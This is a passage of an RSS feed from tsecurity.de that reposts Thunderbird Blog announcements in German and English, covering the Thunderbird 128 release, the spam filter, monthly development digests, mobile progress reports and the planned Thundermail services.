<pubDate>Fri, 08 May 2026 22:29:47 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Ertrinken Sie in E-Mails? Gewinnen Sie Ihre wertvolle Zeit zurück und verwandeln Sie Ihren Posteingang mit diesem erfrischenden Tipp zur E-Mail-Verwaltung in ein Kraftwerk der Produktivität!</p>
<p>The post <a href="https://blog.thunderbird.net/de/2024/06/maximieren-sie-ihren-tag-behandeln-sie-ihre-e-mails-wie-waesche/">Maximieren Sie Ihren Tag: Behandeln Sie Ihre E-Mails wie Wäsche</a> appeared first on <a href="https://blog.thunderbird.net/de/">The Thunderbird Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Willkommen bei Thunderbird 128 „Nebula“]]></title>
<description><![CDATA[Im Weltraum erzeugt eine Supernova die Bausteine der Schöpfung. In einem Nebel nähren diese Elemente neue Möglichkeiten. Thunderbird 128 Nebula vereint das Beste aus Supernova! und baut darauf auf. Finden Sie heraus, was in unserer ersten Version 2024 neu ist.  
The post Willkommen bei Thunderbir...]]></description>
<link>https://tsecurity.de/de/3500409/tools/willkommen-bei-thunderbird-128-nebula/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500409/tools/willkommen-bei-thunderbird-128-nebula/</guid>
<pubDate>Fri, 08 May 2026 22:29:45 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Im Weltraum erzeugt eine Supernova die Bausteine der Schöpfung. In einem Nebel nähren diese Elemente neue Möglichkeiten. Thunderbird 128 Nebula vereint das Beste aus Supernova! und baut darauf auf. Finden Sie heraus, was in unserer ersten Version 2024 neu ist.  </p>
<p>The post <a href="https://blog.thunderbird.net/de/2024/07/willkommen-bei-thunderbird-128-nebula/">Willkommen bei Thunderbird 128 „Nebula“</a> appeared first on <a href="https://blog.thunderbird.net/de/">The Thunderbird Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird und Spam]]></title>
<description><![CDATA[Der Umgang mit Spam in unserer täglichen E-Mail-Routine kann frustrierend sein, aber Thunderbird verfügt über einige Tools, die unerwünschte Nachrichten weniger lästig machen. Es braucht Zeit, Training und Geduld, aber schließlich können Sie können den Kampf gegen Junk-Mails gewinnen. In diesem A...]]></description>
<link>https://tsecurity.de/de/3500408/tools/thunderbird-und-spam/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500408/tools/thunderbird-und-spam/</guid>
<pubDate>Fri, 08 May 2026 22:29:44 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Der Umgang mit Spam in unserer täglichen E-Mail-Routine kann frustrierend sein, aber Thunderbird verfügt über einige Tools, die unerwünschte Nachrichten weniger lästig machen. Es braucht Zeit, Training und Geduld, aber schließlich können Sie können den Kampf gegen Junk-Mails gewinnen. In diesem Artikel erklären wir Ihnen, wie der Spam-Filter von Thunderbird funktioniert und wie Sie ihn […]</p>
<p>The post <a href="https://blog.thunderbird.net/de/2024/09/thunderbird-und-spam/">Thunderbird und Spam</a> appeared first on <a href="https://blog.thunderbird.net/de/">The Thunderbird Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird Monthly Development Digest – February 2025]]></title>
<description><![CDATA[Hello again Thunderbird Community! Despite the winter seeming to last forever and the world being in a state of flux, the Thunderbird team has been hard at work both in development and planning strategic projects. Here’s the latest from the team dedicated to making Thunderbird better each day: Mo...]]></description>
<link>https://tsecurity.de/de/3500407/tools/thunderbird-monthly-development-digest-february-2025/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500407/tools/thunderbird-monthly-development-digest-february-2025/</guid>
<pubDate>Fri, 08 May 2026 22:29:38 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello again Thunderbird Community! Despite the winter seeming to last forever and the world being in a state of flux, the Thunderbird team has been hard at work both in development and planning strategic projects. Here’s the latest from the team dedicated to making Thunderbird better each day: Monthly Releases are here! The concept of […]</p>
<p>The post <a href="https://blog.thunderbird.net/2025/03/thunderbird-monthly-development-digest-february-2025/">Thunderbird Monthly Development Digest – February 2025</a> appeared first on <a href="https://blog.thunderbird.net/">The Thunderbird Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[VIDEO: The Thunderbird Design System]]></title>
<description><![CDATA[In this month’s Community Office Hours, Laurel Terlesky, Design Manager, is talking about the new Thunderbird Design System. In her talk from FOSDEM, “Building a Cross-Platform, Scalable, Open-Source Design System,” Laurel describes the Thunderbird design journey. If you are interested in how the...]]></description>
<link>https://tsecurity.de/de/3500406/tools/video-the-thunderbird-design-system/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500406/tools/video-the-thunderbird-design-system/</guid>
<pubDate>Fri, 08 May 2026 22:29:37 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In this month’s Community Office Hours, Laurel Terlesky, Design Manager, is talking about the new Thunderbird Design System. In her talk from FOSDEM, “Building a Cross-Platform, Scalable, Open-Source Design System,” Laurel describes the Thunderbird design journey. If you are interested in how the desktop and mobile apps have gotten their new look, or in the […]</p>
<p>The post <a href="https://blog.thunderbird.net/2025/03/video-the-thunderbird-design-system/">VIDEO: The Thunderbird Design System</a> appeared first on <a href="https://blog.thunderbird.net/">The Thunderbird Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thundermail and Thunderbird Pro Services]]></title>
<description><![CDATA[Today we’re pleased to announce what many in our open source contributor community already know. The Thunderbird team is working on an email service called “Thundermail” as well as file sharing, calendar scheduling and other helpful cloud-based services that as a bundle we have been calling “Thun...]]></description>
<link>https://tsecurity.de/de/3500405/tools/thundermail-and-thunderbird-pro-services/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500405/tools/thundermail-and-thunderbird-pro-services/</guid>
<pubDate>Fri, 08 May 2026 22:29:35 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Today we’re pleased to announce what many in our open source contributor community already know. The Thunderbird team is working on an email service called “Thundermail” as well as file sharing, calendar scheduling and other helpful cloud-based services that as a bundle we have been calling “Thunderbird Pro.” First, a point of clarification: Thunderbird, the […]</p>
<p>The post <a href="https://blog.thunderbird.net/2025/04/thundermail-and-thunderbird-pro-services/">Thundermail and Thunderbird Pro Services</a> appeared first on <a href="https://blog.thunderbird.net/">The Thunderbird Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird Monthly Development Digest – March 2025]]></title>
<description><![CDATA[Hello again Thunderbird Community! It’s been almost a year since I joined the project and I’ve recently been enjoying the most rewarding and exciting work days in recent memory. The team who works on making Thunderbird better each day is so passionate about their work and truly dedicated to solvi...]]></description>
<link>https://tsecurity.de/de/3500404/tools/thunderbird-monthly-development-digest-march-2025/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500404/tools/thunderbird-monthly-development-digest-march-2025/</guid>
<pubDate>Fri, 08 May 2026 22:29:34 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello again Thunderbird Community! It’s been almost a year since I joined the project and I’ve recently been enjoying the most rewarding and exciting work days in recent memory. The team who works on making Thunderbird better each day is so passionate about their work and truly dedicated to solving problems for users and supporting […]</p>
<p>The post <a href="https://blog.thunderbird.net/2025/04/thunderbird-monthly-development-digest-march-2025/">Thunderbird Monthly Development Digest – March 2025</a> appeared first on <a href="https://blog.thunderbird.net/">The Thunderbird Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird for Android March 2025 Progress Report]]></title>
<description><![CDATA[Hello, everyone, and welcome to the Thunderbird for Android March 2025 Progress Report. We’re keeping our community updated on everything that’s been happening in the Android team, which is quickly becoming a more general mobile team with some recent hires. In addition to team news, we’re talking...]]></description>
<link>https://tsecurity.de/de/3500403/tools/thunderbird-for-android-march-2025-progress-report/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500403/tools/thunderbird-for-android-march-2025-progress-report/</guid>
<pubDate>Fri, 08 May 2026 22:29:33 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello, everyone, and welcome to the Thunderbird for Android March 2025 Progress Report. We’re keeping our community updated on everything that’s been happening in the Android team, which is quickly becoming a more general mobile team with some recent hires. In addition to team news, we’re talking about our roadmap board on GitHub. Team Changes […]</p>
<p>The post <a href="https://blog.thunderbird.net/2025/04/thunderbird-for-android-march-2025-progress-report/">Thunderbird for Android March 2025 Progress Report</a> appeared first on <a href="https://blog.thunderbird.net/">The Thunderbird Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[VIDEO: The New Account Hub]]></title>
<description><![CDATA[In this month’s Community Office Hours, we’re chatting with Vineet Deo, a Software Engineer on the Desktop team, who walks us through the new Account Hub on the Desktop app. If you want a sneak peak at this new streamlined experience, you can find it in the Daily channel now and the Beta channel ...]]></description>
<link>https://tsecurity.de/de/3500402/tools/video-the-new-account-hub/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500402/tools/video-the-new-account-hub/</guid>
<pubDate>Fri, 08 May 2026 22:29:30 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In this month’s Community Office Hours, we’re chatting with Vineet Deo, a Software Engineer on the Desktop team, who walks us through the new Account Hub on the Desktop app. If you want a sneak peak at this new streamlined experience, you can find it in the Daily channel now and the Beta channel towards […]</p>
<p>The post <a href="https://blog.thunderbird.net/2025/04/video-the-new-account-hub/">VIDEO: The New Account Hub</a> appeared first on <a href="https://blog.thunderbird.net/">The Thunderbird Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird Monthly Developer Digest – April 2025]]></title>
<description><![CDATA[Hello from the Thunderbird development team! With some of our time spent onboarding new team members and interviewing for open positions, April was a fun and productive month. Our team grew and we were amazed at how smooth the onboarding process has been, with many contributions already boosting ...]]></description>
<link>https://tsecurity.de/de/3500401/tools/thunderbird-monthly-developer-digest-april-2025/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500401/tools/thunderbird-monthly-developer-digest-april-2025/</guid>
<pubDate>Fri, 08 May 2026 22:29:29 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello from the Thunderbird development team! With some of our time spent onboarding new team members and interviewing for open positions, April was a fun and productive month. Our team grew and we were amazed at how smooth the onboarding process has been, with many contributions already boosting the team’s output. Gearing up for our […]</p>
<p>The post <a href="https://blog.thunderbird.net/2025/05/thunderbird-monthly-development-digest-april-2025/">Thunderbird Monthly Developer Digest – April 2025</a> appeared first on <a href="https://blog.thunderbird.net/">The Thunderbird Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird for Mobile April 2025 Progress Report]]></title>
<description><![CDATA[Here is an update of what Thunderbird’s mobile community has been up to in April 2025. With a new team member, we’re getting Thunderbird for iOS out in the open and continuing to work on release feedback from Thunderbird for Android. The Team is Growing Last month we introduced Todd and Ashley to...]]></description>
<link>https://tsecurity.de/de/3500400/tools/thunderbird-for-mobile-april-2025-progress-report/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500400/tools/thunderbird-for-mobile-april-2025-progress-report/</guid>
<pubDate>Fri, 08 May 2026 22:29:27 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Here is an update of what Thunderbird’s mobile community has been up to in April 2025. With a new team member, we’re getting Thunderbird for iOS out in the open and continuing to work on release feedback from Thunderbird for Android. The Team is Growing Last month we introduced Todd and Ashley to the MZLA […]</p>
<p>The post <a href="https://blog.thunderbird.net/2025/05/thunderbird-for-mobile-april-2025-progress-report/">Thunderbird for Mobile April 2025 Progress Report</a> appeared first on <a href="https://blog.thunderbird.net/">The Thunderbird Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[VIDEO: Talking MZLA with Ryan Sipes]]></title>
<description><![CDATA[In this month’s Community Office Hours, we’re chatting with our director Ryan Sipes. This talk opens with a brief history of Thunderbird and ends on our plans for its future. In between, we explain more about MZLA and its structure, and how this compares to the Mozilla Foundation and Corporation....]]></description>
<link>https://tsecurity.de/de/3500399/tools/video-talking-mzla-with-ryan-sipes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500399/tools/video-talking-mzla-with-ryan-sipes/</guid>
<pubDate>Fri, 08 May 2026 22:29:23 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In this month’s Community Office Hours, we’re chatting with our director Ryan Sipes. This talk opens with a brief history of Thunderbird and ends on our plans for its future. In between, we explain more about MZLA and its structure, and how this compares to the Mozilla Foundation and Corporation. We’ll also cover the new […]</p>
<p>The post <a href="https://blog.thunderbird.net/2025/05/video-talking-mzla-with-ryan-sipes/">VIDEO: Talking MZLA with Ryan Sipes</a> appeared first on <a href="https://blog.thunderbird.net/">The Thunderbird Blog</a>.</p>]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,18ms -->